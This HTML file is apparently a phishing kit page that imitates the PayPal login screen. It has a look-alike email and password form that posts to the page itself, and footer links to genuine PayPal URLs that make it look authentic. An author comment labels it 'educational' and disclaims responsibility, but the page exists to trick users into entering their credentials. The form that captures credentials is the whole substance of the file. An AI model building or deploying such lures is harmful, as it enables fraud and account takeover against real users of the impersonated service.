<!DOCTYPE html>

<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<!--Author: @new92-->
<!--This page has been created only for educational purposes !! The author is not responsible for any illegal actions carried out using this page-->
<head>
    <meta charset="utf-8" />
    <title>Log in to your PayPal account</title>
    <link rel="icon" type="image/x-icon" href="icon.ico" />
<style>
    body {
        font-family: sans-serif;
    }

    a {
        text-decoration: none;
    }

    a:hover {
        text-decoration: underline;
    }
    form {
        border: 1px solid #eaeced;
        border-radius: 8px;
        height: 650px;
        width: 470px;
        font-size: 12px;
        margin-top: 120px;
    }

    .email {
        margin-top: 20px;
        border-radius: 4px;
        height: 55px;
        width: 350px;
        font-size: 18px;
        border: 1px solid #9da3a6;
        font-family: Calibri;
    }

        .email:hover {
            cursor: auto;
            border: 1px solid #2d9ce5;
        }

        .email:focus-visible {
            outline: 2px solid #009aff;
        }

    .password {
        margin-top: 15px;
        border-radius: 4px;
        font-family: Calibri;
        height: 55px;
        width: 350px;
        border: 1px solid #9da3a6;
        font-size: 18px;
    }

        .password:hover {
            cursor: auto;
            border: 1px solid #2d9ce5;
        }

        .password:focus-visible {
            outline: 2px solid #009aff;
        }

    .login {
        margin-top: 15px;
        border-radius: 30px;
        background-color: #0070ba;
        width: 350px;
        height: 45px;
        color: white;
        font-size: 18px;
        text-align: center;
        font-weight: bold;
        font-family: Calibri;
        border: 1px solid #0070ba;
    }

    .login:hover {
        background-color: darkblue;
        cursor: pointer;
    }

    .forpass {
        text-decoration: none;
        color: #0070ba;
        font-size: 20px;
        font-family: Calibri;
        font-weight: bold;
        line-height: 40px;
        margin-left: -197px;
    }

    .forpass:hover {
        text-decoration: underline;
    }

    .footer {
        font-size: 11px;
        height: 50px;
        background-color: #F7F9FA;
        color: #666;
        font-family: sans-serif;
        bottom: 0;
        position: fixed;
        width: 100%;
    }

    .contactus {
        color: #666;
        margin-left: -8px;
        font-weight: bold;
    }

    .privacy {
        margin-left: 10px;
        color: #666;
        font-weight: bold;
    }

    .legal {
        margin-left: 12px;
        color: #666;
        font-weight: bold;
    }

    .policy {
        margin-left: 14px;
        color: #666;
        font-weight: bold;
    }

    .worldwide {
        margin-left: 16px;
        color: #666;
        font-weight: bold;
    }

    .dividerRight {
        border-top: 1px solid #cbd2d6;
        width: 200px;
        margin-left: -230px;
        margin-top: -23px;
    }

    .dividerLeft {
        border-top: 1px solid #cbd2d6;
        width: 200px;
        margin-left: 235px;
        margin-top: -2px;
    }

    .signup {
        font-family: sans-serif;
        font-weight: bold;
        font-size: 15px;
        color: #0070ba;
        border: 1px solid #0070ba;
        border-radius: 30px;
        background-color: white;
        width: 350px;
        height: 45px;
    }

    .signup:hover {
        text-decoration: none;
        cursor: pointer;
        border: 2px solid darkblue;
    }

    .or {
        font-size: 15px; 
        color: #6c7378; 
        font-family: sans-serif; 
        font-weight: bold;
    }

    .deutsch {
        color: #666; 
        font-size: 12px; 
        font-weight: bold; 
        margin-bottom: -26px; 
        margin-left: -75px;
    }

    .deutsch:hover {
        cursor: pointer;
        text-decoration: underline;
    }
</style>
</head>
<body>
    <center><form method="post">
    <img src="logo.png" />
    <br />
    <label for="email"></label>
    <input class="email" type="email" name="email" placeholder="  Email or mobile number" required="required" />
    <label for="password"></label>
    <input class="password" type="password" name="password" placeholder="  Enter your password" required="required" />
    <br />
    <a href="forbidden.html" class="forpass">Forgot password?</a>
    <br />
    <input class="login" type="submit" value="Log In" />
    <br />
    <br />
    <p class="or">or</p>
    <div class="dividerRight">
    </div>
    <div class="dividerLeft">
    </div>
    <br />
    <br />
    <button type="button" href="https://www.paypal.com/webapps/mpp/account-selection" class="signup">Sign Up</button>
    <br />
    <br />
    <br />
    <p class="deutsch">Deutsch </p>
    <p style="color: #666; font-size: 12px; font-weight: bold; margin-left: 30px;">| English</p>
</form></center>

<div class="footer">
    <center>
        <a href="https://www.paypal.com/smarthelp/contact-us" target="_blank" class="contactus">Contact Us</a>
        <a href="https://www.paypal.com/webapps/mpp/ua/privacy-full" target="_blank" class="privacy">Privacy</a>
        <a href="https://www.paypal.com/webapps/mpp/ua/legalhub-full" target="_blank" class="legal">Legal</a>
        <a href="https://www.paypal.com/webapps/mpp/ua/upcoming-policies-full" target="_blank" class="policy">Policy Updates</a>
        <a href="https://www.paypal.com/webapps/mpp/country-worldwide" target="_blank" class="worldwide">Worldwide</a>
    </center>
</div>
</body>
</html>
